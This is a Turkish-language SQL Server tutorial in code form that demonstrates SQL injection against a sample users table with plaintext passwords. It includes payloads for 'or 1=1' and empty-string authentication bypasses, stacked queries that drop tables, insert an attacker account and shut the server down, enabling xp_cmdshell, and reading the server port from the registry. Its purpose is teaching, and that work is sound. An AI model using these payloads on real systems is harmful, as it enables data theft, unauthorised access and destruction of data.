SQL INJECTION
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 |
/* SQL Injection, veritabanı sunucusuna gönderilen sorgu bloğuna, yeni bir sorgu sıkıştırma yöntemiyle gerçekleşir. */ create table kullanicilar ( kullaniciId int IDENTITY(1,1) Primary key, kullaniciAd nvarchar(20), kullaniciSifre nvarchar(20), kullaniciEmail nvarchar(20), kullaniciTelefon nvarchar(20), ) insert into kullanicilar values ('Ali','123','asd@hotmail.com','02213987654') insert into kullanicilar values ('Veli','11223','aasdsd@hotmail.com','0216987654') insert into kullanicilar values ('Mehmet','062123','amassd@hotmail.com','053287654') insert into kullanicilar values ('Ayşe','aks123','asfasfd@hotmail.com','054213654') insert into kullanicilar values ('Fatma','fasf123','asdhhg@hotmail.com','05553987654') select * from kullanicilar where kullaniciId=1 -- Bu kod satırı tek 1 data listeler. Şimdi küçük bir oynama yapalım. select * from kullanicilar where kullaniciId=1 or 1=1 -- Bu satırda ise bütün datalar listelenir. select kullaniciAd,kullaniciEmail from kullanicilar where kullaniciAd = '' or ''='' and kullaniciSifre='' or ''='' -- Bu satırda da boş değer göndererek bütün dataları listeleyebiliyoruz. select * from kullanicilar where kullaniciEmail = 'x' drop table Urunler -- Bu basit gibi görünen select sorgusunda urunler tablosu silinir /*Sql sorgusunda bir select sorgusu gerçekleşirken sorgu arasında bir veri eklemesi gerçekleştirilebilir.*/ select * from kullanicilar where kullaniciEmail='x' insert into kullanicilar values ('saldirgan','sifre11','test@test.com','01234456') -- Sorgu çalışır ve saldırgan artık sistemin kullanıcısı olmuştur. -- Basit bir sorguyu tehlikeli hale getirmek için Escape karakteride kullanılabilir. select * from kullanicilar where kullaniciAd='/' drop table deneme -- Sorgusu çalıştığında hem kullanıcı listelemez hemde deneme tablosu -- silindiğine dair herhangi bir bildirim yapılmaz select kullaniciAd from kullanicilar where kullaniciAd='' shutdown with nowait and kullaniciSifre='' /*Shutdown komutu veritabanı sunucusunun kapatılmasını sağlar. Ancak shutdown with nowait olarak kullanılması, bekleme yapmadan hemen kapat anlamına gelir. Bu durumda hiçbir işlem beklenmeden tüm işlemler kesilir ve sunucu kapatılır. Durum bu kadar da sınırlı değildir.Sql serverda veritabanı sunucusu içerisinden işletim sistemini yönetmek için tasarlanmış nesneler ve ifadeler vardır. Bunların en önemlilerinden biri xp_cmdshell dir. Varsayılan olarak nerdeyse hiçbir hosting firması bu nesneye erişim izni vermez.*/ select * from kullanicilar where kullaniciAd ='x' and kullaniciId is NULL exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'xp_cmdshell',1 reconfigure -- Bu sorgu çalışırken SQL profiler ile izlendiğinde yaptığı işlemin aşağıdaki ile -- eş değer olduğu görülebilir. exec sp_configure 'xp_cmdshell',1 /* Sunucu adı, servis adı, sql serverın kullandığı port gibi birçok bilgi aşağıdaki kodla elde edilebilir. */ SELECT @@SERVERNAME AS SunucuAd, @@SERVICENAME AS ServisAd; DECLARE @value VARCHAR(20); DECLARE @key VARCHAR(100); IF ISNULL(CHARINDEX('\', @@SERVERNAME, 0), 0) > 0 BEGIN SET @key = 'SOFTWARE\Microsoft\Microsoft SQL Server\' + @@servicename + '\MSSQLServer\SuperSocketNetLib\Tcp'; END ELSE BEGIN SET @key = 'SOFTWARE\MICROSOFT\MSSQLSERVER\MSSQLSERVER\SUPERSOCKETNETLIB\TCP'; END SELECT @KEY as [Key] EXEC master..xp_regread @rootkey = 'HKEY_LOCAL_MACHINE', @key = @key, @value_name = 'TcpPort', @value = @value OUTPUT SELECT 'Port Numarası : ' + CAST(@value AS VARCHAR(5)) AS PortNumber; |